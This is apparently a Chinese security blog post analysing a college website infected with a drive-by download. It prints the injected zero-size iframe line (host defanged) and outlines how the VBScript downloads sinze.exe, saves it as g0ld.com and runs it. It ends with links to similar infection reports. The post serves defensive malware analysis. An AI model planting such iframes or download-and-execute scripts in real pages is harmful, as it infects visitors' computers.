01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

简介: 01-15/某师范学院网站被挂马 sinze.exe/Virus.Win32.Delf.an

网站的网页被加入代码:

/------
<iframe src=hxxp://i***.the*c***.cn/sin**ze*/sin**ze*.htm width=0 height=0></iframe>
------/

sin**ze*.htm   Kaspersky 报为 Trojan-Downloader.VBS.Psyme.ei。

在浏览器中打开该网页,会看到信息:

/------

就不让你看!气死你 by ******!

------/

其中******处的字符串可能是作者昵称,这里偶匿了。

还没完,网页中接下来有利用Replace()来保护自身的VBScript脚本,会利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 sinze.exe,保存为 %temp%/g0ld.com,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。

sinze.exe 采用 ASPack 加壳


相关文章
|
2月前
|
安全 网络协议
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
刘三姐故乡的某网站被植入下载Worm.Win32.Delf.bse, Worm.Win32.Viking.ls等的代码
|
2月前
|
缓存 算法 网络协议
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
文学论坛挂的马换 成 Worm.Win32.Agent.imh 了
|
2月前
|
安全 JavaScript 前端开发
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
某农业产品贸易网挂马Trojan.DL.Win32.Mnless.bes/Trojan-Dropper.Win32.Agent.xdu
|
2月前
|
JavaScript 前端开发 安全
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
某文学论坛被挂马 Worm.Win32.Agent.ipi/Trojan.Win32.Agent.avt
|
2月前
|
安全
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
某电力信息网挂马Worm.Win32.AutoRun,Trojan-Downloader.Win32.Losabel
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
数码相机存储卡居然带system.exe / Virus.Win32.Delf.an / Dropper.Gpigeon.fc
|
2月前
|
安全 Shell
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
遭遇Trojan-Spy.Win32.Delf.uv,Trojan.PSW.Win32.XYOnline,Trojan.PSW.Win32.ZhengTu等1
|
2月前
|
安全 JavaScript 前端开发
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛上挂的东东,JPG图片 or 病毒Trojan.Win32.VB.azc?
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
某论坛被挂马 down.exe / Virus.Win32.AutoRun.z / Trojan.PWS.Maran.262
|
2月前
|
JavaScript 前端开发 数据安全/隐私保护
一个下载Trojan-Downloader.Win32.Delf.ajm,技术比较新奇的网页
一个下载Trojan-Downloader.Win32.Delf.ajm,技术比较新奇的网页